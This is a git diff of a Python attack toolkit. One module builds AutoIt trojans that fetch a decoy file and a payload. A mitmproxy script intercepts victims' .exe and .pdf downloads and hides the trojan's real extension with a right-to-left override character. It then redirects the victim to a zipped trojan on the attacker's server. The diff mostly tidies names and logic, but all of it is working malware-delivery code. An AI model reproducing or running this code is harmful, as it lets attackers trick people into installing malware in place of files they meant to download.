diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0557015 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +trojan.txt diff --git a/Trojan.py b/Trojan.py index 990b422..d4335b5 100644 --- a/Trojan.py +++ b/Trojan.py @@ -4,11 +4,10 @@ import zipfile - TROJAN_SOURCE_CODE_FILE = "trojan.txt" AUT2EXE = "/root/.wine/drive_c/Program Files (x86)/AutoIt3/Aut2Exe/Aut2exe.exe" -trojan_code = """ +TROJAN_CODE = """ #include #include Local $urlsArray = StringSplit($urls, ",", 2 ) @@ -35,16 +34,15 @@ def __init__(self, url1, url2, icon, out_file): file_type = url1.split(".")[-1].replace("#", "") self.icon = self.set_icon(icon, file_type) self.out_file = out_file - - + def create(self): urls = 'Local $urls = "' + self.url1 + "," +self.url2 + '"\n' with open(TROJAN_SOURCE_CODE_FILE, "w") as trojan_file: - trojan_file.write(urls + trojan_code) + trojan_file.write(urls + TROJAN_CODE) def compile(self): subprocess.call('wine "' + AUT2EXE + '" /In "' + TROJAN_SOURCE_CODE_FILE + '" /Out "' + self.out_file +'" /Icon "' + self.icon + '"' , shell=True) - + def set_icon(self, icon, file_type): icons_directory = os.path.dirname(os.path.realpath(__file__)) + "/icons" if icon == None: @@ -52,11 +50,10 @@ def set_icon(self, icon, file_type): if not os.path.isfile(icon) : print("[-] Can't find icon at " + icon) - print("[-] Using generaic icon.") + print("[-] Using generic icon.") icon = icons_directory + "/generic.ico" return icon - def zip(self, file_to_zip): os.chdir(os.path.dirname(file_to_zip)) trojan_name = file_to_zip.split("/")[-1] diff --git a/__pycache__/Trojan.cpython-37.pyc b/__pycache__/Trojan.cpython-37.pyc new file mode 100644 index 0000000..5a342fa Binary files /dev/null and b/__pycache__/Trojan.cpython-37.pyc differ diff --git a/mitmproxy_script.py b/mitmproxy_script.py index 22e411e..cd1d279 100644 --- a/mitmproxy_script.py +++ b/mitmproxy_script.py @@ -1,44 +1,40 @@ import mitmproxy -import subprocess import os -from Trojan import * +from Trojan import Trojan IP = "10.20.215.11" TARGET_TEXTENSIONS = [".exe", ".pdf"] -EVIL_FILE = "http://10.20.215.11/nv.exe" +EVIL_FILE_URL = "http://10.20.215.11/nv.exe" WEB_ROOT = "/var/www/html/" SPOOF_EXTENSION = True def request(flow): #code to handle request flows - + if flow.request.host != IP and flow.request.pretty_url.endswith(tuple(TARGET_TEXTENSIONS)): print("[+] Got interesting flow") - + front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0] - front_file = flow.request.pretty_url + "#" - download_file_name = front_file_name + ".exe" - trojan_file = WEB_ROOT + download_file_name - + front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] + + front_file_url = flow.request.pretty_url + "#" + trojan_file_name = front_file_name + ".exe" + download_file_name = trojan_file_name + if SPOOF_EXTENSION and front_file_extension != "exe": + print("[+] Renaming trojan to spoof its extension") + trojan_file_name = front_file_name + "\u202E" + "".join(reversed(front_file_extension)) + ".exe" + trojan_file = WEB_ROOT + trojan_file_name print("[+] Generating a trojan for " + flow.request.pretty_url) - trojan = Trojan(front_file, EVIL_FILE, None, trojan_file) + trojan = Trojan(front_file_url, EVIL_FILE_URL, None, trojan_file) trojan.create() trojan.compile() - if SPOOF_EXTENSION == True: - print("[+] Renaming trojan to spoof its extension") - front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1] - if front_file_extension != "exe": - new_name = front_file_name + "‮" + "".join(reversed(front_file_extension)) + ".exe" - spoofed_file = WEB_ROOT + new_name - os.rename(trojan_file, spoofed_file) - - trojan.zip(spoofed_file) - download_file_name = front_file_name + ".zip" - - - torjan_download_url = "http://" + IP + "/" + download_file_name - flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": torjan_download_url}) + if SPOOF_EXTENSION: + trojan.zip(trojan_file) + download_file_name = front_file_name + ".zip" + + trojan_download_url = "http://" + IP + "/" + download_file_name + flow.response = mitmproxy.http.HTTPResponse.make(301, "", {"Location": trojan_download_url}) diff --git a/trojan_factory.py b/trojan_factory.py index 621a617..f897e2e 100644 --- a/trojan_factory.py +++ b/trojan_factory.py @@ -1,7 +1,7 @@ #!/usr/bin/env python import optparse -from Trojan import * +from Trojan import Trojan parser = optparse.OptionParser() @@ -24,5 +24,5 @@ trojan.create() trojan.compile() -if options.zip: +if options.zip: trojan.zip(options.out_file_path)